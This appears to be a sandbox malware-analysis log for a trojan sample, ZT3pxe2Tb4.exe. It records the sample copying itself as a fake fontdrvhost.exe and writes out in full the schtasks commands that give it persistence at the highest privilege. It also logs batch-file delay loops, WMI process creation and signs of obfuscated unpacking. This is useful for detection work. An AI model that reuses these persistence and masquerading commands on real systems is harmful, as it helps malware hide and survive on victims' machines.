Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Uses 32bit PE files
Source: ZT3pxe2Tb4.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs Cryptographic APIs: 'CreateDecryptor'
Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs Cryptographic APIs: 'CreateDecryptor'
Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs Cryptographic APIs: 'CreateDecryptor'
Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs Cryptographic APIs: 'CreateDecryptor'
Source: DnshUSLJ.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: tAOrkGQb.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: SKewgrff.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: IbKgwPay.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: zsrQNmVQ.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.evad.winEXE@93/244@0/1
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tqrrAUxf.log Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\cfcca84f50e77cb6ac0a04c26d8ae71e39090d16a37d1ce7f59ef27a8be95bc3
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\AppData\Local\Temp\Haf5RcGt9x Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
Source: ZT3pxe2Tb4.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ZT3pxe2Tb4.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ZT3pxe2Tb4.exe ReversingLabs: Detection: 86%
Source: ZT3pxe2Tb4.exe Virustotal: Detection: 73%
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File read: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ZT3pxe2Tb4.exe "C:\Users\user\Desktop\ZT3pxe2Tb4.exe"
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown Process created: C:\Users\user\AppData\Local\fontdrvhost.exe C:\Users\user\AppData\Local\fontdrvhost.exe
Source: unknown Process created: C:\Users\user\AppData\Local\fontdrvhost.exe C:\Users\user\AppData\Local\fontdrvhost.exe
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ZT3pxe2Tb4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ZT3pxe2Tb4.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: ZT3pxe2Tb4.exe Static file information: File size 3672576 > 1048576
Source: ZT3pxe2Tb4.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x380200
Source: ZT3pxe2Tb4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnet0l source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdbd source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnnecg source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: fontdrvhost.exe, 0000002A.00000002.2225604158.000000001CC92000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Unpacked PE file: 0.2.ZT3pxe2Tb4.exe.1670000.5.unpack
.NET source code contains method to dynamically call methods (often used by packers)
Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs .Net Code: Type.GetTypeFromHandle(yhXwkbJpFlaQ2BEhFNf.vV0LqIx2Ymr(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(yhXwkbJpFlaQ2BEhFNf.vV0LqIx2Ymr(16777246)),Type.GetTypeFromHandle(yhXwkbJpFlaQ2BEhFNf.vV0LqIx2Ymr(16777260))})
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD7964 push ebx; retf 0_2_00007FFD9BBD796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB7967 push ebx; retf 8_2_00007FFD9BBB796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BC4000A push ebx; ret 8_2_00007FFD9BC4007A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9C0D7498 push ebx; iretd 8_2_00007FFD9C0D756A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA2E94A push edx; retf 9_2_00007FFD9BA2E94B
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA23FBC push eax; retf 9_2_00007FFD9BA23FBD
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA67963 push ebx; retf 9_2_00007FFD9BA6796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 14_2_00007FFD9BBE792B push ebx; retf 14_2_00007FFD9BBE796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BA0E94A push edx; retf 21_2_00007FFD9BA0E94B
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BA03FBC push eax; retf 21_2_00007FFD9BA03FBD
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BA47963 push ebx; retf 21_2_00007FFD9BA4796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BC4000A push ebx; ret 21_2_00007FFD9BC4007A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C0F7C2B push E8FFFFFFh; retf 21_2_00007FFD9C0F7C31
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C0D7498 push ebx; iretd 21_2_00007FFD9C0D756A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C116131 push cs; ret 21_2_00007FFD9C11617F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C117967 push ebx; retf 21_2_00007FFD9C11796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC7969 push ebx; retf 27_2_00007FFD9BBC796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9C0C7498 push ebx; iretd 34_2_00007FFD9C0C756A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA2E94A push edx; retf 35_2_00007FFD9BA2E94B
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA23FBC push eax; retf 35_2_00007FFD9BA23FBD
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA67963 push ebx; retf 35_2_00007FFD9BA6796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBE7228 push E8FFFFFFh; retf 35_2_00007FFD9BBE7231
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C136131 push cs; ret 35_2_00007FFD9C13617F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C137967 push ebx; retf 35_2_00007FFD9C13796A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C117C27 push E8FFFFFFh; retf 35_2_00007FFD9C117C31
Source: ZT3pxe2Tb4.exe, IpUxhliHKcCdFefNH6B.cs High entropy of concatenated method names: 'M5xiNYhW88', 'krFixFhEKk', 'ujQise37PE', 'XDZ2qnWhUT4o3s6uaQ2C', 'VWnjYnWhvl7OjqSw0nsS', 'WhauFJWhPaBKUerrygMK', 'lRV843WhEgQOlQX6KsYA', 'pqch5qWh5vfdVB6uP9D1', 'UeI9ydWhI6YGaVvZwKlL', 'TlMEauWhQIQeJm4RKeGW'
